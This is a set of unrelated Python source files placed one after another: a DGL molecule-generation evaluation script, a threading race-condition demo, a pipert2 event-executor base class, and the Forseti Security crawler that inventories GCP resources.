es_ref.append(es)
if not args.executor:
app.run(host='localhost' if args.localhost else "0.0.0.0",
debug=True,
port=args.port,
use_reloader=False)
es.stop()
else:
import atexit
def tmp():
es.stop()
atexit.register(tmp)
# Wait for an event that will never arrive (passive wait)
event = threading.Event()
event.wait()
if __name__ == '__main__':
main()
|
eval.py
|
import os
import pickle
import shutil
import torch
from dgl import model_zoo
from utils import MoleculeDataset, set_random_seed, download_data,\
mkdir_p, summarize_molecules, get_unique_smiles, get_novel_smiles
def generate_and_save(log_dir, num_samples, max_num_steps, model):
with open(os.path.join(log_dir, 'generated_smiles.txt'), 'w') as f:
for i in range(num_samples):
with torch.no_grad():
s = model(rdkit_mol=True, max_num_steps=max_num_steps)
f.write(s + '\n')
def prepare_for_evaluation(rank, args):
worker_seed = args['seed'] + rank * 10000
set_random_seed(worker_seed)
torch.set_num_threads(1)
# Setup dataset and data loader
dataset = MoleculeDataset(args['dataset'], subset_id=rank, n_subsets=args['num_processes'])
# Initialize model
if not args['pretrained']:
model = model_zoo.chem.DGMG(atom_types=dataset.atom_types,
bond_types=dataset.bond_types,
node_hidden_size=args['node_hidden_size'],
num_prop_rounds=args['num_propagation_rounds'], dropout=args['dropout'])
model.load_state_dict(torch.load(args['model_path'])['model_state_dict'])
else:
model = model_zoo.chem.load_pretrained('_'.join(['DGMG', args['dataset'], args['order']]), log=False)
model.eval()
worker_num_samples = args['num_samples'] // args['num_processes']
if rank == args['num_processes'] - 1:
worker_num_samples += args['num_samples'] % args['num_processes']
worker_log_dir = os.path.join(args['log_dir'], str(rank))
mkdir_p(worker_log_dir, log=False)
generate_and_save(worker_log_dir, worker_num_samples, args['max_num_steps'], model)
def remove_worker_tmp_dir(args):
for rank in range(args['num_processes']):
worker_path = os.path.join(args['log_dir'], str(rank))
try:
shutil.rmtree(worker_path)
except OSError:
print('Directory {} does not exist!'.format(worker_path))
def aggregate_and_evaluate(args):
print('Merging generated SMILES into a single file...')
smiles = []
for rank in range(args['num_processes']):
with open(os.path.join(args['log_dir'], str(rank), 'generated_smiles.txt'), 'r') as f:
rank_smiles = f.read().splitlines()
smiles.extend(rank_smiles)
with open(os.path.join(args['log_dir'], 'generated_smiles.txt'), 'w') as f:
for s in smiles:
f.write(s + '\n')
print('Removing temporary dirs...')
remove_worker_tmp_dir(args)
# Summarize training molecules
print('Summarizing training molecules...')
train_file = '_'.join([args['dataset'], 'DGMG_train.txt'])
if not os.path.exists(train_file):
download_data(args['dataset'], train_file)
with open(train_file, 'r') as f:
train_smiles = f.read().splitlines()
train_summary = summarize_molecules(train_smiles, args['num_processes'])
with open(os.path.join(args['log_dir'], 'train_summary.pickle'), 'wb') as f:
pickle.dump(train_summary, f)
# Summarize generated molecules
print('Summarizing generated molecules...')
generation_summary = summarize_molecules(smiles, args['num_processes'])
with open(os.path.join(args['log_dir'], 'generation_summary.pickle'), 'wb') as f:
pickle.dump(generation_summary, f)
# Stats computation
print('Preparing generation statistics...')
valid_generated_smiles = generation_summary['smile']
unique_generated_smiles = get_unique_smiles(valid_generated_smiles)
unique_train_smiles = get_unique_smiles(train_summary['smile'])
novel_generated_smiles = get_novel_smiles(unique_generated_smiles, unique_train_smiles)
with open(os.path.join(args['log_dir'], 'generation_stats.txt'), 'w') as f:
f.write('Total number of generated molecules: {:d}\n'.format(len(smiles)))
f.write('Validity among all: {:.4f}\n'.format(
len(valid_generated_smiles) / len(smiles)))
f.write('Uniqueness among valid ones: {:.4f}\n'.format(
len(unique_generated_smiles) / len(valid_generated_smiles)))
f.write('Novelty among unique ones: {:.4f}\n'.format(
len(novel_generated_smiles) / len(unique_generated_smiles)))
if __name__ == '__main__':
import argparse
import datetime
import time
from rdkit import rdBase
from utils import setup
parser = argparse.ArgumentParser(description='Evaluating DGMG for molecule generation',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# configure
parser.add_argument('-s', '--seed', type=int, default=0, help='random seed')
# dataset and setting
parser.add_argument('-d', '--dataset',
help='dataset to use')
parser.add_argument('-o', '--order', choices=['random', 'canonical'],
help='order to generate graphs, used for naming evaluation directory')
# log
parser.add_argument('-l', '--log-dir', default='./eval_results',
help='folder to save evaluation results')
parser.add_argument('-p', '--model-path', type=str, default=None,
help='path to saved model')
parser.add_argument('-pr', '--pretrained', action='store_true',
help='Whether to use a pre-trained model')
parser.add_argument('-ns', '--num-samples', type=int, default=100000,
help='Number of molecules to generate')
parser.add_argument('-mn', '--max-num-steps', type=int, default=400,
help='Max number of steps allowed in generated molecules to ensure termination')
# multi-process
parser.add_argument('-np', '--num-processes', type=int, default=32,
help='number of processes to use')
parser.add_argument('-gt', '--generation-time', type=int, default=600,
help='max time (seconds) allowed for generation with multiprocess')
args = parser.parse_args()
args = setup(args, train=False)
rdBase.DisableLog('rdApp.error')
t1 = time.time()
if args['num_processes'] == 1:
prepare_for_evaluation(0, args)
else:
import multiprocessing as mp
procs = []
for rank in range(args['num_processes']):
p = mp.Process(target=prepare_for_evaluation, args=(rank, args,))
procs.append(p)
p.start()
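        # Poll worker liveness within the wall-clock generation budget. The
        # while-loop's else branch below runs only if the budget expires
        # without a break, in which case the remaining workers are terminated.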
while time.time() - t1 <= args['generation_time']:
if any(p.is_alive() for p in procs):
time.sleep(5)
else:
break
else:
print('Timeout, killing all processes.')
for p in procs:
p.terminate()
p.join()
t2 = time.time()
print('It took {} for generation.'.format(
datetime.timedelta(seconds=t2 - t1)))
aggregate_and_evaluate(args)
|
thread.py
|
import threading
# global variable x
x = 0
def increment():
"""
function to increment global variable x
"""
global x
x += 1
def thread_task():
"""
task for thread
calls increment function 100000 times.
"""
for _ in range(100000):
increment()
def main_task():
global x
# setting global variable x as 0
x = 0
# creating threads
t1 = threading.Thread(target=thread_task)
t2 = threading.Thread(target=thread_task)
# start threads
t1.start()
t2.start()
# wait until threads finish their job
t1.join()
t2.join()
if __name__ == "__main__":
for i in range(100):
main_task()
print("Iteration {0}: x = {1}".format(i,x))
|
base_event_executor.py
|
from logging import Logger
from multiprocessing import Process
from pipert2.utils.method_data import Method
from pipert2.utils.dummy_object import Dummy
from pipert2.utils.interfaces import EventExecutorInterface
from pipert2.utils.annotations import class_functions_dictionary
from pipert2.utils.consts import KILL_EVENT_NAME, STOP_EVENT_NAME
from pipert2.core.managers.event_board import EventBoard, EventHandler
class BaseEventExecutor(EventExecutorInterface):
"""BaseEventExecutor is an base implementation for event loop listener.
"""
events = class_functions_dictionary()
def __init__(self, event_board: EventBoard, logger: Logger):
"""
Args:
event_board (EventBoard): The EventBoard of the pipe.
logger (Logger): Logger object for logging the flow actions.
"""
self._logger = logger
self.event_loop_process: Process = Dummy()
self.events_to_listen = set(self.get_events().keys())
self.event_board = event_board
self.event_handler: EventHandler = Dummy()
def build(self) -> None:
"""Start the event loop process.
"""
self._before_build()
self.event_handler = self.event_board.get_event_handler(self.events_to_listen)
self.event_loop_process = Process(target=self.run)
self.event_loop_process.start()
def run(self) -> None:
"""The event loop process, executing the pipe events that occur.
"""
event: Method = self.event_handler.wait()
while event.event_name != KILL_EVENT_NAME:
self.execute_event(event)
event = self.event_handler.wait()
self.execute_event(Method(STOP_EVENT_NAME))
def execute_event(self, event: Method) -> None:
"""Execute the event callbacks.
Args:
event: The event to be executed.
"""
EventExecutorInterface.execute_event(self, event)
def join(self) -> None:
"""Block until the event loop process terminates
"""
if self.event_loop_process.is_alive():
self.event_loop_process.join()
self._after_join()
@classmethod
def get_events(cls):
"""Get the events of the implement.
Returns:
dict[str, set[Callback]]: The events callbacks mapped by their events.
"""
return cls.events.all[cls.__name__]
def _before_build(self) -> None:
"""The implementation can implement this method and called in build.
"""
pass
def _after_join(self):
"""The implementation can implement this method and called in build.
"""
pass
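# Editor's note: a minimal, hedged subclassing sketch for the executor above.
# It only uses the hooks defined in this file; constructing a real EventBoard
# and Logger is outside the scope of the snippet.
class MyEventExecutor(BaseEventExecutor):
    """Example executor overriding the optional lifecycle hooks."""

    def _before_build(self) -> None:
        self._logger.info("allocating resources before the event loop starts")

    def _after_join(self) -> None:
        self._logger.info("cleaning up after the event loop process exited")

# Typical lifecycle (assuming `event_board` and `logger` already exist):
#   executor = MyEventExecutor(event_board, logger)
#   executor.build()   # starts the event-loop process
#   ...                # publish events through the EventBoard
#   executor.join()    # blocks until a KILL event ends the loop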
|
crawler.py
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Crawler implementation."""
from Queue import Empty
from Queue import Queue
import threading
import time
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.services.inventory.base import cai_gcp_client
from google.cloud.forseti.services.inventory.base import cloudasset
from google.cloud.forseti.services.inventory.base import crawler
from google.cloud.forseti.services.inventory.base import gcp
from google.cloud.forseti.services.inventory.base import resources
LOGGER = logger.get_logger(__name__)
class CrawlerConfig(crawler.CrawlerConfig):
"""Crawler configuration to inject dependencies."""
def __init__(self, storage, progresser, api_client, variables=None):
"""Initialize
Args:
storage (Storage): The inventory storage
progresser (QueueProgresser): The progresser implemented using
a queue
api_client (ApiClientImpl): GCP API client
variables (dict): config variables
"""
super(CrawlerConfig, self).__init__()
self.storage = storage
self.progresser = progresser
self.variables = {} if not variables else variables
self.client = api_client
class ParallelCrawlerConfig(crawler.CrawlerConfig):
"""Multithreaded crawler configuration, to inject dependencies."""
def __init__(self, storage, progresser, api_client, threads=10,
variables=None):
"""Initialize
Args:
storage (Storage): The inventory storage
progresser (QueueProgresser): The progresser implemented using
a queue
api_client (ApiClientImpl): GCP API client
threads (int): how many threads to use
variables (dict): config variables
"""
super(ParallelCrawlerConfig, self).__init__()
self.storage = storage
self.progresser = progresser
self.variables = {} if not variables else variables
self.threads = threads
self.client = api_client
class Crawler(crawler.Crawler):
"""Simple single-threaded Crawler implementation."""
def __init__(self, config):
"""Initialize
Args:
config (CrawlerConfig): The crawler configuration
"""
super(Crawler, self).__init__()
self.config = config
def run(self, resource):
"""Run the crawler, given a start resource.
Args:
resource (object): Resource to start with.
Returns:
QueueProgresser: The filled progresser described in inventory
"""
resource.accept(self)
return self.config.progresser
def visit(self, resource):
"""Handle a newly found resource.
Args:
resource (object): Resource to handle.
Raises:
Exception: Reraises any exception.
"""
progresser = self.config.progresser
try:
resource.get_iam_policy(self.get_client())
resource.get_gcs_policy(self.get_client())
resource.get_dataset_policy(self.get_client())
resource.get_cloudsql_policy(self.get_client())
resource.get_billing_info(self.get_client())
resource.get_enabled_apis(self.get_client())
resource.get_kubernetes_service_config(self.get_client())
self.write(resource)
except Exception as e:
LOGGER.exception(e)
progresser.on_error(e)
raise
else:
progresser.on_new_object(resource)
def dispatch(self, callback):
"""Dispatch crawling of a subtree.
Args:
callback (function): Callback to dispatch.
"""
callback()
def write(self, resource):
"""Save resource to storage.
Args:
resource (object): Resource to handle.
"""
self.config.storage.write(resource)
def get_client(self):
"""Get the GCP API client.
Returns:
object: GCP API client
"""
return self.config.client
def on_child_error(self, error):
"""Process the error generated by child of a resource
Inventory does not stop for children errors but raise a warning
Args:
error (str): error message to handle
"""
warning_message = '{}\n'.format(error)
self.config.storage.warning(warning_message)
self.config.progresser.on_warning(error)
def update(self, resource):
"""Update the row of an existing resource
Args:
resource (Resource): Resource to update.
Raises:
Exception: Reraises any exception.
"""
try:
self.config.storage.update(resource)
except Exception as e:
LOGGER.exception(e)
self.config.progresser.on_error(e)
raise
class ParallelCrawler(Crawler):
"""Multi-threaded Crawler implementation."""
def __init__(self, config):
"""Initialize
Args:
config (ParallelCrawlerConfig): The crawler configuration
"""
super(ParallelCrawler, self).__init__(config)
self._write_lock = threading.Lock()
self._dispatch_queue = Queue()
self._shutdown_event = threading.Event()
def _start_workers(self):
"""Start a pool of worker threads for processing the dispatch queue."""
self._shutdown_event.clear()
for _ in xrange(self.config.threads):
worker = threading.Thread(target=self._process_queue)
worker.daemon = True
worker.start()
def _process_queue(self):
"""Process items in the queue until the shutdown event is set."""
while not self._shutdown_event.is_set():
try:
callback = self._dispatch_queue.get(timeout=1)
except Empty:
continue
callback()
self._dispatch_queue.task_done()
def run(self, resource):
"""Run the crawler, given a start resource.
Args:
resource (Resource): Resource to start with.
Returns:
QueueProgresser: The filled progresser described in inventory
"""
try:
self._start_workers()
resource.accept(self)
self._dispatch_queue.join()
finally:
self._shutdown_event.set()
# Wait for threads to exit.
time.sleep(2)
return self.config.progresser
def dispatch(self, callback):
"""Dispatch crawling of a subtree.
Args:
callback (function): Callback to dispatch.
"""
self._dispatch_queue.put(callback)
def write(self, resource):
"""Save resource to storage.
Args:
resource (Resource): Resource to handle.
"""
with self._write_lock:
self.config.storage.write(resource)
def on_child_error(self, error):
"""Process the error generated by child of a resource
Inventory does not stop for children errors but raise a warning
Args:
error (str): error message to handle
"""
warning_message = '{}\n'.format(error)
with self._write_lock:
self.config.storage.warning(warning_message)
self.config.progresser.on_warning(error)
def update(self, resource):
"""Update the row of an existing resource
Args:
resource (Resource): The db row of Resource to update
Raises:
Exception: Reraises any exception.
"""
try:
with self._write_lock:
self.config.storage.update(resource)
except Exception as e:
LOGGER.exception(e)
self.config.progresser.on_error(e)
raise
def _api_client_factory(storage, config, parallel):
"""Creates the proper initialized API client based on the configuration.
Args:
storage (object): Storage implementation to use.
config (object): Inventory configuration on server.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
Union[gcp.ApiClientImpl, cai_gcp_client.CaiApiClientImpl]:
The initialized api client implementation class.
"""
client_config = config.get_api_quota_configs()
client_config['domain_super_admin_email'] = config.get_gsuite_admin_email()
asset_count = 0
if config.get_cai_enabled():
asset_count = cloudasset.load_cloudasset_data(storage.session, config)
LOGGER.info('%s total assets loaded from Cloud Asset data.',
asset_count)
if asset_count:
engine = config.get_service_config().get_engine()
return cai_gcp_client.CaiApiClientImpl(client_config,
engine,
parallel,
storage.session)
# Default to the non-CAI implementation
return gcp.ApiClientImpl(client_config)
def _crawler_factory(storage, progresser, client, parallel):
"""Creates the proper initialized crawler based on the configuration.
Args:
storage (object): Storage implementation to use.
progresser (object): Progresser to notify status updates.
client (object): The API client instance.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
Union[Crawler, ParallelCrawler]:
The initialized crawler implementation class.
"""
if parallel:
parallel_config = ParallelCrawlerConfig(storage, progresser, client)
return ParallelCrawler(parallel_config)
# Default to the non-parallel crawler
crawler_config = CrawlerConfig(storage, progresser, client)
return Crawler(crawler_config)
def _root_resource_factory(config, client):
"""Creates the proper initialized crawler based on the configuration.
Args:
config (object): Inventory configuration on server.
client (object): The API client instance.
Returns:
Resource: The initialized root resource.
"""
if config.use_composite_root():
composite_root_resources = config.get_composite_root_resources()
return resources.CompositeRootResource.create(composite_root_resources)
# Default is a single resource as root.
return resources.from_root_id(client, config.get_root_resource_id())
def run_crawler(storage,
progresser,
config,
parallel=True):
"""Run the crawler with a determined configuration.
Args:
storage (object): Storage implementation to use.
progresser (object): Progresser to notify status updates.
config (object): Inventory configuration on server.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
QueueProgresser: The progresser implemented in inventory
"""
if parallel and 'sqlite' in str(config.get_service_config().get_engine()):
LOGGER.info('SQLite used, disabling parallel threads.')
parallel = False
client = _api_client_factory(storage, config, parallel)
crawler_impl = _crawler_factory(storage, progresser, client, parallel)
resource = _root_resource_factory(config, client)
progresser = crawler_impl.run(resource)
# flush the buffer at the end to make sure nothing is cached.
storage.commit()
return progresser
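# Editor's note: a minimal, hedged sketch of the dispatch-queue pattern used by
# ParallelCrawler above (daemon workers pull callbacks off a queue until a
# shutdown event is set). It is written for Python 3, whereas the module above
# targets Python 2 (Queue, xrange).
import queue
import threading

def make_worker_pool(num_threads=4):
    tasks = queue.Queue()
    shutdown = threading.Event()

    def worker():
        while not shutdown.is_set():
            try:
                callback = tasks.get(timeout=1)
            except queue.Empty:
                continue
            callback()
            tasks.task_done()

    for _ in range(num_threads):
        t = threading.Thread(target=worker)
        t.daemon = True
        t.start()
    return tasks, shutdown

# Usage: put callables on `tasks`, call tasks.join() to wait for completion,
# then shutdown.set() so the daemon workers stop polling.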
|